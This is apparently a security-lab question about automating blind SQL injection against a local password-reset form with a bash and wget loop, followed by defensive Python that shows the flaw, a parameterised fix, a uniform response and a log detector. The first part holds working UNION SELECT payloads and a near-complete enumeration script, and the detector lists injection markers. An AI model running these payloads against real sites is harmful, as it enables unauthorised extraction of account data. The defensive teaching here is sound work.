For an IT-security lab I am trying to create a bash script to automate event-based blind SQL injection. The website has a forgotten-password feature which takes a username and either responds with "an email has been sent" or "error". This website is vulnerable to SQL injection. My aim is to retrieve the admin's username by iterating through the alphabet and challenging the database (the username consists only of a..z). The SQL injection put into the username field would be

```sql
' UNION SELECT username FROM users WHERE username LIKE 'a%' AND admin=1 -- -
```

to check if the admin's username starts with an 'a'. Next I would check 'b' and so on. I know I have the right letter when the page retrieve_password.html is delivered; otherwise it is error.html. As soon as I get positive feedback I will continue with the next letter, e.g. 'aa', 'ab' and so on. After each positive feedback I would check if I already have the full name by:

```sql
' UNION SELECT username FROM users WHERE username='abc' AND admin=1 -- -
```
My rough idea of the script:

```bash
#!/bin/bash
for ((i=0;i<50;i++))
do
    for x in {a..z}
    do
        wget --post-data 'username=\' UNION SELECT username FROM users WHERE username like \'$name$x%\' AND admin=1 -- -' http://127.0.0.1:8081/retrieve_password
        if [ #positive feedback ]
        then
            #Try if correct username is already retrieved
            wget --post-data 'username=\' UNION SELECT username FROM users WHERE username='$name$x' AND admin=1 -- -' http://127.0.0.1:8081/retrieve_password
            #If username was found exit
            if [ #positive feedback ]
            then
                echo $name$x
                exit
            else
                name+=$x
                break
            fi
        fi
    done
done
```
- What would be a proper wget statement for my purpose?
- How do I process the response to my wget post request?
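From the defending side, the lab exercise above rests on two weaknesses in the forgotten-password handler: the username is spliced into the SQL text, and the two distinct responses ("email sent" vs. "error") give the prober a yes/no oracle. The following Python example is added here and is not code from the question or from the lab application; it assumes a constructed SQLite `users` table with the columns the payload names (`username`, `admin`) plus an `email` column, and a constructed application log line format (`<timestamp> <source-ip> reset username="..."`). It contrasts the string-concatenated lookup with a parameterised one, shows a response that no longer distinguishes existing from non-existing accounts, and runs a small detector over sample log lines that flags both SQL metacharacters in the username field and a burst of reset requests from one source, which is what the letter-by-letter probing looks like on the server.

```python
import re
import sqlite3
from collections import defaultdict

# Constructed in-memory stand-in for the lab's users table (assumption: schema).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, email TEXT, admin INTEGER)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("alice", "alice@example.test", 0),
                    ("abc", "admin@example.test", 1)])
    return db

# The flaw the question relies on: the username is concatenated into the SQL
# text, so the leading quote closes the literal and the rest is parsed as SQL.
def lookup_email_vulnerable(db, username):
    query = "SELECT email FROM users WHERE username='" + username + "'"
    row = db.execute(query).fetchone()
    return row[0] if row else None

# Hardened form: the username is bound as a parameter and is never part of the
# SQL text, so the same payload is merely a username that does not exist.
def lookup_email_safe(db, username):
    row = db.execute("SELECT email FROM users WHERE username=?",
                     (username,)).fetchone()
    return row[0] if row else None

# Closing the oracle: the handler answers identically whether or not the account
# exists. The email address is returned to the caller only for the mail step.
def reset_response(db, username):
    email = lookup_email_safe(db, username)
    return "If that account exists, an email has been sent.", email

# The payload from the question, with the probed prefix as a template slot.
PAYLOAD_TEMPLATE = ("' UNION SELECT username FROM users "
                    "WHERE username LIKE '{}%' AND admin=1 -- -")
PAYLOAD = PAYLOAD_TEMPLATE.format("a")

# Detection over a constructed application log (assumption: log format).
LOG_LINE = re.compile(r'^(\S+) (\S+) reset username="(.*)"$')
SQLI_MARKERS = re.compile(r"'|\bunion\b|\bselect\b|--", re.IGNORECASE)

def scan_reset_log(lines, burst_threshold=5):
    """Return (injection_hits, bursty_sources).

    injection_hits: (timestamp, source, username) for every reset request whose
                    username field contains SQL metacharacters or keywords.
    bursty_sources: sources that sent at least burst_threshold reset requests,
                    the footprint of letter-by-letter enumeration.
    """
    injection_hits = []
    per_source = defaultdict(int)
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # ignore lines that are not reset requests
        ts, src, username = m.groups()
        per_source[src] += 1
        if SQLI_MARKERS.search(username):
            injection_hits.append((ts, src, username))
    bursty = sorted(s for s, n in per_source.items() if n >= burst_threshold)
    return injection_hits, bursty

# Constructed sample log: one legitimate reset, then six probes from one source.
SAMPLE_LOG = ['2024-05-01T10:00:00Z 10.0.0.7 reset username="alice"'] + [
    f'2024-05-01T10:00:0{i}Z 10.0.0.5 reset username="{PAYLOAD_TEMPLATE.format(c)}"'
    for i, c in enumerate("abcdef", start=1)
]

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_email_vulnerable(db, PAYLOAD))
    print("safe:      ", lookup_email_safe(db, PAYLOAD))
    print("response:  ", reset_response(db, "nobody")[0])
    hits, bursty = scan_reset_log(SAMPLE_LOG)
    print("flagged requests:", len(hits), "bursty sources:", bursty)
```

The parameterised lookup alone removes the injection; the uniform response removes the account-existence oracle even if some other query is still flawed. The detector is deliberately simple: in practice the burst threshold would be applied per time window, and the keyword pattern would be one of several signals rather than a sole trigger.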